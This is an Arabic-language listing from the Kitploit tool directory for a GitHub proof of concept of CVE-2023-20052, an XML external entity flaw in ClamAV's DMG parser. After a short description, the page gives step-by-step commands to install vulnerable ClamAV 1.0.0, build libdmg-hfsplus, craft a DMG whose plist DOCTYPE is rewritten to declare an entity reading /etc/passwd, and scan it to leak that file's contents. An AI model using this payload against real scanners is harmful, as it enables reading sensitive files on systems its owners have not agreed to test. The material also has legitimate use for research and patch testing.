Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-20052 — ثغرة تسرب معلومات CVE-2023-20052 في محلل ملفات DMG في ClamAV | Kitploit
أدوات/GitHubGitHub/cy83rr0h1t/cve-2023-20052
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتتحليل البرمجيات الخبيثة
GitHubcy83rr0h1t/cve-2023-20052

CVE-2023-20052

ثغرة تسرب معلومات CVE-2023-20052 في محلل ملفات DMG في ClamAV

عرض المستودع
13منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-20052

ثغرة تسريب معلومات CVE-2023-20052 في محلل ملفات DMG الخاص بـ ClamAV
ثغرة في محلل ملفات DMG في إصدارات ClamAV 1.0.0 والإصدارات الأقدم، و 0.105.1 والإصدارات الأقدم، و 0.103.7 والإصدارات الأقدم قد تسمح لمهاجم غير مصادق عن بُعد بالوصول إلى معلومات حساسة على جهاز متأثر. تنشأ هذه الثغرة بسبب تمكين استبدال كيانات XML مما قد يؤدي إلى حقن كيان خارجي XML. يمكن للمهاجم استغلال هذه الثغرة عن طريق إرسال ملف DMG معد لفحصه بواسطة ClamAV على جهاز متأثر. يمكن للاستغلال الناجح أن يسمح للمهاجم بتسريب بايتات من أي ملف قد يتم قراءته بواسطة عملية فحص ClamAV.

تم الاختبار على Ubuntu 20.04

كيفية تثبيت ClamAV الإصدار 1.0.0

  • https://github.com/Cisco-Talos/clamav/releases/download/clamav-1.0.0/clamav-1.0.0.linux.i686.deb
  • https://github.com/Cisco-Talos/clamav/releases/download/clamav-1.0.0/clamav-1.0.0.linux.x86_64.deb

sudo dpkg -i package-name.deb
1

  • sudo apt install -f

  • mkdir /usr/local/share/clamav

  • mv /usr/local/etc/freshclam.conf.sample /usr/local/etc/freshclam.conf


2
  • sudo adduser clamav
    3

  • sudo chown -R 1002:1003 /usr/local/share/clamav

  • sudo freshclam
    4

  • 5

    • clamscan --version
      6

    تثبيت بعض الأشياء الإضافية اللازمة لهذا الاستغلال.

    • apt-get update

    • apt-get install -y ca-certificates gnupg wget

    • echo "deb http://archive.debian.org/debian-security stretch/updates main" >> /etc/apt/sources.list

    • wget -q -O - https://ftp-master.debian.org/keys/archive-key-9-security.asc | apt-key add -

    • apt-get update -y

    • sudo apt install -y libssl1.0-dev gcc g++ cmake zlib1g-dev genisoimage bbe git hfsplus
      7

    • git clone https://github.com/planetbeing/libdmg-hfsplus.git
      8

    • cd /libdmg-hfsplus

    • cmake .
      9

    • make
      10

    • cp dmg/dmg /bin
      sudo genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
      11

    bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit2.dmg 12

    • clamscan --debug exploit2.dmg 13

    المرجع: https://github.com/nokn0wthing/CVE-2023-20052

    تنزيل الأداة